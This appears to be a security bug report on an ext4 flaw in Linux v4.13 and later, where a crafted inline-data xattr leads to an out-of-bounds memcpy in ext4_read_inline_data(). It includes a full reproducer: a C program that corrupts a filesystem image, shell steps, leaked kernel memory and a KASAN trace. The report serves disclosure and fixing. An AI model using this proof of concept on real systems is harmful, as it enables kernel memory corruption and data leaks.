1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 |
ext4 can store data for small regular files as "inline data", meaning that the data is stored inside the corresponding inode instead of in separate blocks. Inline data is stored in two places: The first 60 bytes go in the i_block field in the inode (which normally contains a list of blocks instead), the rest goes in the special filesystem-internal extended attribute "system.data". Since commit e50e5129f384 ("ext4: xattr-in-inode support", in v4.13+), ext4 can store extended attribute values not only inline in the inode, but can also store such values in dedicated inodes. When a corrupted filesystem stores the system.data extended attribute value in a dedicated inode, the kernel gets confused, causing memory corruption. ext4_find_inline_data_nolock() attempts to locate an inode's inline data by searching for the system.data xattr using ext4_xattr_ibody_find(). If the inode has xattrs, ext4_xattr_ibody_find() first checks them for corruption using xattr_check_inode(), then grabs the wanted xattr using xattr_find_entry(). xattr_check_inode() uses ext4_xattr_check_entries() to check the individual xattrs, but skips most checks if <code>entry->e_value_inum != 0</code> (marking an xattr whose value is in a dedicated inode) - only for inline values, length and offset checks are performed to ensure that the value actually fits into the inode. The problem is that ext4_find_inline_data_nolock() then assumes that the returned xattr uses inline storage and that the returned length will fit into the inode; it stores the length field from the xattr in <code>EXT4_I(inode)->i_inline_size</code> without further checks. Later, when the file is read, ext4_read_inline_data() trusts this length value, causing an out-of-bounds memcpy() in the following line: memcpy(buffer, (void *)IFIRST(header) + le16_to_cpu(entry->e_value_offs), len); To reproduce, on a system with kernel v4.13 or newer, ideally with KASAN on: 1.
Create a new ext4 filesystem image, with 256-byte inodes and inline data support: $ mkfs.ext4 -b 4096 -I 256 -O inline_data testfs.img 400k mke2fs 1.43.7 (16-Oct-2017) Creating regular file testfs.img Filesystem too small for a journal Creating filesystem with 100 4k blocks and 64 inodes Allocating group tables: done Writing inode tables: done Writing superblocks and filesystem accounting information: done 2. Create a 75-byte file in the new filesystem: $ mkdir mount $ sudo mount testfs.img mount $ sudo dd bs=75 count=1 if=/dev/zero of=mount/testfile 1+0 records in 1+0 records out 75 bytes copied, 0.000811554 s, 92.4 kB/s $ sudo umount mount 3. Bump up the inode size, bump up the xattr size, and mark the xattr value as non-inline: $ cat fixup.c #include <stdint.h> #include <fcntl.h> #include <err.h> #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <sys/stat.h> #define __le16 uint16_t #define __le32 uint32_t #define __u16 uint16_t #define __u32 uint32_t #define __u8 uint8_t /* some definitions from kernel headers */ #define EXT4_NDIR_BLOCKS 12 #define EXT4_IND_BLOCK EXT4_NDIR_BLOCKS #define EXT4_DIND_BLOCK (EXT4_IND_BLOCK + 1) #define EXT4_TIND_BLOCK (EXT4_DIND_BLOCK + 1) #define EXT4_N_BLOCKS (EXT4_TIND_BLOCK + 1) #define EXT4_XATTR_MAGIC 0xEA020000 struct ext4_inode { __le16 i_mode; __le16 i_uid; __le32 i_size_lo; __le32 i_atime; __le32 i_ctime; __le32 i_mtime; __le32 i_dtime; __le16 i_gid; __le16 i_links_count; __le32 i_blocks_lo; __le32 i_flags; union { struct { __le32 l_i_version; } linux1; } osd1; __le32 i_block[EXT4_N_BLOCKS]; __le32 i_generation; __le32 i_file_acl_lo; __le32 i_size_high; __le32 i_obso_faddr; union { struct { __le16 l_i_blocks_high; __le16 l_i_file_acl_high; __le16 l_i_uid_high; __le16 l_i_gid_high; __le16 l_i_checksum_lo; __le16 l_i_reserved; } linux2; } osd2; __le16 i_extra_isize; __le16 i_checksum_hi; __le32 i_ctime_extra; __le32 i_mtime_extra; __le32 i_atime_extra; __le32 i_crtime; __le32 i_crtime_extra; __le32 i_version_hi; __le32 i_projid; }; struct
ext4_xattr_ibody_header { __le32 h_magic; }; struct ext4_xattr_entry { __u8 e_name_len; __u8 e_name_index; __le16 e_value_offs; __le32 e_value_inum; __le32 e_value_size; __le32 e_hash; char e_name[0]; }; #define INODE_SIZE 256 #define ROUND_UP(x,round) ( ((x)+((round)-1)) & ~((round)-1) ) int main(int argc, char **argv) { char *path = argv[1]; int fd = open(path, O_RDWR); if (fd == -1) err(1, "open"); struct stat st; if (fstat(fd, &st)) err(1, "fstat"); char *map = mmap(NULL, st.st_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); if (map == MAP_FAILED) err(1, "mmap"); for (int i=0; i<st.st_size/INODE_SIZE; i++) { struct ext4_inode *ino = (void*)(map + i * INODE_SIZE); if (ino->i_links_count != 1 || ino->i_size_lo != 75) continue; printf("found inode (idx=%d, size=%u, mode=%ho)\n", i, ino->i_size_lo, ino->i_mode); ino->i_size_lo = 60000; printf("i_extra_isize = %hu\n", ino->i_extra_isize); struct ext4_xattr_ibody_header *hdr = (void*)( ((char*)ino)+128+ino->i_extra_isize ); if (hdr->h_magic != EXT4_XATTR_MAGIC) continue; struct ext4_xattr_entry *entry = (void*)(hdr+1); while (*(uint32_t*)entry != 0) { printf("attr: idx=%hhu name='%*s' offs=%hu inum=%u size=%u\n", entry->e_name_index, entry->e_name_len, entry->e_name, entry->e_value_offs, entry->e_value_inum, entry->e_value_size); entry->e_value_offs = 0; entry->e_value_inum = 20; entry->e_value_size = 60000; entry = (void*)( (char*)entry + sizeof(*entry) + ROUND_UP(entry->e_name_len, 4) ); } } } $ gcc -o fixup fixup.c -Wall $ ./fixup testfs.img found inode (idx=555, size=75, mode=100644) i_extra_isize = 32 attr: idx=7 name='data' offs=76 inum=0 size=15 4. Use fsck to fix up the inode checksum (but don't let it fix anything else!): $ fsck.ext4 -f testfs.img e2fsck 1.43.7 (16-Oct-2017) Pass 1: Checking inodes, blocks, and sizes Inode 12 has INLINE_DATA_FL flag but extended attribute not found. Truncate<y>? no Extended attribute in inode 12 has a value size (60000) which is invalid Clear<y>?
no Inode 12 passes checks, but checksum does not match inode. Fix<y>? yes Pass 2: Checking directory structure Pass 3: Checking directory connectivity Pass 4: Checking reference counts Pass 5: Checking group summary information testfs.img: ***** FILE SYSTEM WAS MODIFIED ***** testfs.img: ********** WARNING: Filesystem still has errors ********** testfs.img: 12/64 files (0.0% non-contiguous), 13/100 blocks 5. Mount the filesystem again: $ sudo mount testfs.img mount 6. Read the file: $ hexdump -C mount/testfile 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000030 00 00 00 00 00 00 00 00 00 00 00 00 04 07 00 00 |................| 00000040 14 00 00 00 60 ea 00 00 00 00 00 00 64 61 74 61 |....`.......data| 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000004a0 31 00 00 00 00 00 00 00 e0 d1 fc 98 d7 7f 00 00 |1...............| 000004b0 e0 07 03 99 d7 7f 00 00 00 00 00 00 00 00 00 00 |................| 000004c0 00 00 00 00 00 00 00 00 e0 5f 00 00 00 00 00 00 |........._......| 000004d0 64 00 00 00 00 00 00 00 f0 af 02 99 d7 7f 00 00 |d...............| 000004e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| [...] 7. Check dmesg: $ dmesg [...] [ 3211.552729] ================================================================== [ 3211.552782] BUG: KASAN: use-after-free in ext4_read_inline_data+0x114/0x120 [ext4] [ 3211.552787] Write of size 59940 at addr ffff8802ba1d003c by task pool/12922 [ 3211.552796] CPU: 3 PID: 12922 Comm: pool Not tainted 4.17.0-rc4+ #7 [ 3211.552798] Hardware name: LENOVO 20FCS12V06/20FCS12V06, BIOS N1FET43W (1.17 ) 08/02/2016 [ 3211.552799] Call Trace: [ 3211.552807] dump_stack+0x71/0xab [ 3211.552813] print_address_description+0x6a/0x250 [ 3211.552817] kasan_report+0x258/0x380 [ 3211.552863] ? ext4_read_inline_data+0x114/0x120 [ext4] [ 3211.552867] memcpy+0x34/0x50 [ 3211.552914] ext4_read_inline_data+0x114/0x120 [ext4] [ 3211.552961] ext4_read_inline_page+0x1e4/0x2a0 [ext4] [ 3211.553006] ?
ext4_read_inline_data+0x120/0x120 [ext4] [ 3211.553053] ext4_readpage_inline+0x13e/0x160 [ext4] [ 3211.553101] ext4_readpage+0xf5/0x110 [ext4] [ 3211.553106] generic_file_read_iter+0x9a4/0xea0 [ 3211.553112] ? filemap_range_has_page+0x160/0x160 [ 3211.553116] ? save_stack+0x89/0xb0 [ 3211.553120] ? __kasan_slab_free+0x105/0x150 [ 3211.553124] ? aa_path_link+0x1f0/0x1f0 [ 3211.553128] ? do_syscall_64+0x150/0x160 [ 3211.553132] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 3211.553137] ? audit_watch_compare+0x1b/0x50 [ 3211.553142] __vfs_read+0x239/0x340 [ 3211.553145] ? __x64_sys_copy_file_range+0x2d0/0x2d0 [ 3211.553149] ? dput.part.19+0x2e/0x1b0 [ 3211.553154] ? auditd_test_task+0x43/0x60 [ 3211.553158] vfs_read+0xa5/0x190 [ 3211.553162] ksys_read+0xa1/0x120 [ 3211.553166] ? kernel_write+0xa0/0xa0 [ 3211.553171] do_syscall_64+0x6d/0x160 [ 3211.553175] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 3211.553178] RIP: 0033:0x7f9ada1af72c [ 3211.553180] RSP: 002b:00007f9ac2258888 EFLAGS: 00000246 ORIG_RAX: 0000000000000000 [...]
[ 3211.553197] The buggy address belongs to the page: [ 3211.553202] page:ffffea000ae87400 count:2 mapcount:0 mapping:ffff88021fe57898 index:0x0 [ 3211.553207] flags: 0x17fffc000000021(locked|lru) [ 3211.553213] raw: 017fffc000000021 ffff88021fe57898 0000000000000000 00000002ffffffff [ 3211.553219] raw: ffffea000858fc20 ffff8803d0a204a0 0000000000000000 ffff8803cf31cac0 [ 3211.553222] page dumped because: kasan: bad access detected [ 3211.553224] page->mem_cgroup:ffff8803cf31cac0 [ 3211.553229] Memory state around the buggy address: [ 3211.553234] ffff8802ba1d0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 3211.553238] ffff8802ba1d0f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 3211.553243] >ffff8802ba1d1000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 3211.553246] ^ [ 3211.553250] ffff8802ba1d1080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 3211.553254] ffff8802ba1d1100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 3211.553257] ================================================================== |